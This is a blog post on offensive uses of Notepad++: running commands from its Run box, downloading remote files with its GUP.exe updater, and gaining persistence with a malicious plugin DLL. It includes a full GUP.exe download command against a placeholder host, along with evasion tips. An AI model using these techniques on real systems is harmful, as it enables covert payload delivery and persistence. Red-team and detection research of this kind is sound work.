<- Home
[16/06/2022]

Offensive Notepad++

Contents

Intro

Notepad++ is a pretty nice text editor primarily for Windows which boasts a large amount of supported programming languages and a huge amount of customization in a small, minimal, and extensible package. Due to these features, it's a widely installed application to use instead of Window's dismal default notepad application. This text editor has so many features crammed into it that it has accidentally opened up some avenues for abuse by threat actors and red team members alike. In this document I'll be covering some useful (and less useful) features that you can abuse to perform unintended actions that could come in useful in specific situations where Notepad++ happens to be installed.

Indirect Execution Via 'Run' Feature

So here's a bit of a strange one that I'm actually not sure is even useful at all. Recently at work, we had to respond to a domain compromise where the attacker gained RDP access to a workstation. Once authenticated the attacker noticed that Notepad++ was installed and instead of just opening cmd.exe to begin pasting their enumeration playbook... Decided to open Notepad++ and press F5 to open a run box and just ran all of their enumeration through that. If you're confused don't worry, so am I. From an EDR perspective this doesn't mask the activity at all as at the end of the day an instance of cmd.exe is still spawned and executes an enumeration command. Not only this but for some EDR providers cmd.exe being launched from Notepad++.exe will likely trigger some sort of 'cmd launched with suspicious parent' rule or something along those lines.

With this said, there is actually a nice synergy with this technique and the next one you're about to read that might actually keep you under the radar by a less experienced analyst.

Remote File Download Via Gup.exe

GUP.exe is located in C:\Program Files\Notepad++\updater and is a fork of wingup (a "Generic Updater running under Windows environment"). Notepad++ uses GUP.exe to fetch and install updates and works very well, however there is a cool "Living Off The Land Binary" method where you can download a file from a remote location using this program by using the following command: 

GUP.exe -unzipTo "" "output_directory" "folder_name http://remote_location.com/file.exe 6a8dbafeec737018cb6729da64021d41d22a23a8a77d727a0b2e852f3eb93a33"

Note

That hash you see at the end of the command is required and should be a SHA256 Checksum of the folder/file you're fetching.

Now using this in isolation and just throwing this in cmd.exe would scream malicious activity, however pairing this with the previously mentioned 'Run' feature and this becomes quite a bit harder to spot as some Notepad++ plugins also utilize GUP.exe allowing you to blend in with the noise a bit. A keen analyst should spot this pretty fast and rules looking for web addresses in command line arguments should pick you up pretty fast but a convincing domain name with what looks like a file that could be related to plugin could be very nice.

Persistence Via Plugin

Now we're into the good stuff because my god this is pretty mental. So let's start with what a Notepad++ plugin is: To extend the functionality of Notepad++ you can download plugins to load into the program that let you perform cool extra functions for example adding an HTML preview window or a code snippets editor (you can find a list of plugins here!).

Now you'll probably be slightly uncomfortable after downloading one of these plugins when you unzip the folder to find it's just a .dll. You're probably seeing where this is going but yes... Notepad++ will execute anything inside DllMain...

So here's what you have to do: Download the Notepad++ Plugin Template and then open it in Visual Studio (or whatever IDE you use). Locate DllMain which is in NppPluginDemo.cpp and add whatever you want into DLL_PROCESS_ATTACH or into pluginInit() located in PluginDefinition.cpp. Compile this and then drop the DLL in: 

C:\Program Files\Notepad++\plugins\NameOfPlugin\NameOfPlugin.dll

Note

The plugin must be in it's own folder that shares the exact same name as the DLL inside it.

It's trivial to execute a Cobalt Strike stager through this or since this is just c++, fetch a remote payload and directly inject it into another process. Now until my C2 framework is in a position where I can show it off, please enjoy this dull and unimpressive calc pop:

Final Thoughts

Well there we go, a small collection of some interesting interactions you might be able to abuse on the off chance you see Notepad++ installed on a machine. To the threat actor who decided to run their enumeration though Notepad++ Run function: maybe brush up on your opsec/evasion skills as this really didn't do you any favours and was actually more noisy than just executing cmd.exe from explorer.exe which could have looked like admin activity and would draw less attention.

If you, the reader, find any other cool "features" of Notepad++ please do tweet me (@felixm_pw) your findings!